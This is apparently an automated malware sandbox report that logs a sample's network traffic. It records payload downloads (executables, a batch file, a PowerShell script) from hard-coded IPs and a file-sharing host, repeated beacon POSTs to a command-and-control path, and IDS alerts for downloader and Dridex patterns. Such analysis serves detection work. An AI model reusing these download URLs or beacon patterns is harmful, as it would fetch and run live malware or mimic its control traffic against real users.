Source: global traffic	HTTP traffic detected: GET /files/7098980627/7aencsM.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 34 38 37 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1084873001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 38 35 31 33 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1085139001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /testdef/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 35 33 37 38 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1085378101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 35 33 37 39 30 32 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1085379021&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 38 35 33 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1085381001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/7098980627/7aencsM.exe HTTP/1.1Host: 185.215.113.75If-Modified-Since: Mon, 17 Feb 2025 23:05:36 GMTIf-None-Match: "67b3c0c0-44200"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 35 33 38 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1085382001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/1506757897/tYliuwV.ps1 HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 35 33 38 35 30 34 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1085385041&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/7984100976/Ta3ZyUR.exe HTTP/1.1Host: 185.215.113.75If-Modified-Since: Mon, 17 Feb 2025 13:16:20 GMTIf-None-Match: "67b336a4-54400"
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 35 33 38 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1085386001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/7868598855/DTQCxXZ.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 35 33 38 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1085387001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/5728215906/d2YQIJa.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 35 33 38 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1085388001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/6691015685/Bjkm5hE.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 35 33 38 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1085389001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/6495630113/qFqSpAp.exe HTTP/1.1Host: 185.215.113.75If-Modified-Since: Sun, 16 Feb 2025 17:08:47 GMTIf-None-Match: "67b21b9f-61b200"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 38 35 33 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1085390001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.75 185.215.113.75

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64641 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:64642 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64638 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:64637 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64645 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64646 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64647 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64650 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64652 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64653 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64655 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64660 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:64657 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64661 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64662 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64666 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64669 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:64670 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64671 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64673 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64672 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64679 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:64677 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64675 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64683 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:64681 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:64684 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:64688 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:64689 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64686 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:64693 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:64694 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64680 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64696 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:64697 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:64695 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:64700 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64701 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:64692 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:64723 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:64729 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:64730 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:64733 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:64734 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:64731 -> 5.75.210.149:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:64756 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64757 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64774 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:64789 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64790 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64797 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64812 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64825 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64830 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:64828 -> 185.215.113.75:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64834 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64835 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64832 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64842 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64844 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64847 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64846 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64836 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64840 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:64848 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64849 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64850 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64851 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64841 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64852 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64854 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64855 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64853 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64823 -> 172.67.150.155:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64831 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64839 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64858 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64859 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64856 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64860 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64861 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64862 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64863 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64865 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64867 -> 104.21.60.59:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64868 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64870 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64871 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:64872 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:64687 -> 104.21.21.16:443

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 4_2_0045BE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,

4_2_0045BE30

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 5.75.210.149Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dl/20891284/xclient.exe HTTP/1.1Host: tmpfiles.org
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCNy9zQEIucrNAQip0c0BCInTzQEIqdXNAQjJ1s0BCPTWzQEIqNjNAQj5wNQVGOmYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCNy9zQEIucrNAQip0c0BCInTzQEIqdXNAQjJ1s0BCPTWzQEIqNjNAQj5wNQVGOmYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dl/20891284/xclient.exe HTTP/1.1Host: tmpfiles.orgCookie: XSRF-TOKEN=eyJpdiI6IkFsM0ZRQXV6ZHQ1SmoveW9rM3pQaEE9PSIsInZhbHVlIjoiU21ZU1QvOCtJWnNRL2tkWTVwc3pSK1pwU2JXRmdRTStEbDVSUjdvQWUvTmNISUFzZHFNaWcwVWNzZmhVZmVZRmN0Y2U1bjRiU3pYYm9SdDQ1RDFSak1takROd05PbmthWVNNejVENkYxYTU3Y09SNUVHNkRlRmRrSWNVc3MrMWwiLCJtYWMiOiIyZTRkNDMwM2NjNGI2ZTY3M2JmYTlhOTc4MTM0MzYwOTgyNWZiNTliMzE5MmMwNTJiODQ1NTlkZTViZjJjNTFlIn0%3D; tmpfiles_session=eyJpdiI6InBvTlIzQmo3WUk0ZlRDOS9GTmEzaXc9PSIsInZhbHVlIjoiZW0wOTl0b1AxSlRqY2ZPUUFWeWh6TThnbVBNWlhwYjJJM2xiQ0VqZUNBWVplVWVRbFB0OXN4c0V6dWRmaitUeXFTNVdzMFFqVHowNDh4UmlsdTdGVEozbzBJYkJtR3B6QlRXczhxUTYzMU9CL053T1YwYTh1L3VZWjA0TnRoQXciLCJtYWMiOiJhMjI4NmQyZTYwMTc1ZGY3OTU0YWM0Y2YyMWZiZjgzMTI4ZmYzNGIxMTViMDAyZWU5MjczYmVjN2ZjYWE5YWMxIn0%3D
